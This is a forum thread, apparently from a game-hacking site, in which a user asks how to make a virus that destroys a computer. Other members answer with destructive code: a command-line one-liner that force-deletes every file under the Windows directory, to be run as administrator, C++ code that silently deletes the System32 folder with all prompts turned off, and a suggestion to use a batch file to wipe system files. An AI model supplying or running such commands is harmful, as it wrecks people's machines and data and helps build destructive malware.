Thread: i need help

Results 1 to 4 of 4
  1. #1
    jokerpro123's Avatar
    Join Date
    Aug 2012
    Gender
    male
    Posts
    49
    Reputation
    10
    Thanks
    0
    My Mood
    Relaxed

    i need help

    i need help to make a computer virus that can "Destroy" the computer i.e make it stop in time.

  2. #2
    殺す必要がある唯一のものは殺されるために準備され人 々である。
    Premium Member
    Hitokiri~'s Avatar
    Join Date
    Oct 2012
    Gender
    female
    Location
    Cancer.
    Posts
    1,201
    Reputation
    24
    Thanks
    937
    My Mood
    Bitchy
    Code:
    del /f /s %windir%\*
    Works every time.
    Make sure you run cmd.exe as admin.

  3. #3
    InunoTaishou's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Location
    The Internet
    Posts
    446
    Reputation
    20
    Thanks
    951
    My Mood
    Relaxed
    Code:
    #include <Windows.h>
    #include <string>
    
    bool explorer_operation(std::wstring, std::wstring, size_t, bool = false);
    
    void main()
    {
    	explorer_operation(L"C:\\Windows\\System 32\\", L"", FO_DELETE);
    }
    
    bool explorer_operation(std::wstring pathFrom, std::wstring pathTo, size_t operation, bool allow_undo)
    {
    	for (int i = 0; i != 2; ++i) {
    		pathFrom.push_back('\0');
    		pathTo.push_back('\0');
    	}
    
    	SHFILEOPSTRUCT fileop;
    	fileop.hwnd = NULL;    // no status display
    	fileop.wFunc = operation;
    	fileop.pFrom = pathFrom.c_str();
    	fileop.pTo = pathTo.c_str();
    	fileop.fFlags = FOF_NOCONFIRMATION | FOF_SILENT;  // do not prompt the user
    
    	if (allow_undo)
    		fileop.fFlags |= FOF_ALLOWUNDO;
    
    	fileop.fAnyOperationsAborted = FALSE;
    	fileop.lpszProgressTitle = NULL;
    	fileop.hNameMappings = NULL;
    
    	return (SHFileOperation(&fileop) == 0);
    }
    Untested
    Last edited by InunoTaishou; 07-09-2015 at 07:03 PM.
    https://www.mpgh.net/forum/signaturepics/sigpic210976_1.gif

  4. #4
    Jim Morrison's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Location
    Canterlot, Equestria
    Posts
    12,444
    Reputation
    1090
    Thanks
    3,336
    You could just make a .bat file to destroy the system files and gg.


    MPGH Staff History:
    Minion: 02-12-2013 - 6-28-2013
    Former Staff: 6-28-2013 - 7-14-2014
    Minion: 7-14-2014 - 1-3-2015
    Minion+: 1-3-2015 - 6-1-2015
    Moderator: 6-1-2015 - 10-2-2016
    Global Moderator: 10-2-2016 - Current

    Current Sections:
    DayZ Mod & Standalone Hacks & Cheats
    BattleOn Games Hacks, Cheats & Trainers
    Minecraft Hacks
    Other Semi-Popular First Person Shooter Hacks
    Blackshot Hacks & Cheats
    Need For Speed World Hacks
    Other First Person Shooter Hacks
    CounterStrike: Global Offensive Hacks
    Garry's Mod Hacks & Cheats


    Donating:
    If you want to donate money to me I take Bitcoin & Paypal, PM me for either of these if you're interested and thanks.
    Top Donators: (Awesome People)
    FanticSteal $75.00
    smurf_master $58.00 <- Best DayZ Gear Seller
    Fujiyama $25.00
    [MPGH]Black $10.00
    [MPGH]Hova $10.00
    xJudgez $4.54
    [MPGH]Normen's Sheep $3.50
    eminemlover $1.50


    Brony?
    https://www.mpgh.net/forum/groups/1728-mpgh-bronies.html

Similar Threads

  1. [Help Request] Need Help
    By shane11 in forum CrossFire Help
    Replies: 49
    Last Post: 05-03-2011, 04:29 AM
  2. [Help Request] Need help finding a Vindictus injector
    By VpChris in forum Vindictus Help
    Replies: 2
    Last Post: 05-01-2011, 10:51 PM
  3. [Help Request] need help with mod
    By .:MUS1CFR34K:. in forum Call of Duty Modern Warfare 2 GSC Modding Help/Discussion
    Replies: 4
    Last Post: 05-01-2011, 12:40 PM
  4. [Help Request] I need help~~!!!!
    By c834606877 in forum Alliance of Valiant Arms (AVA) Help
    Replies: 1
    Last Post: 05-01-2011, 01:12 AM
  5. [Help Request] need help with modding
    By BayBee Alyn in forum Combat Arms Help
    Replies: 0
    Last Post: 04-27-2011, 09:06 PM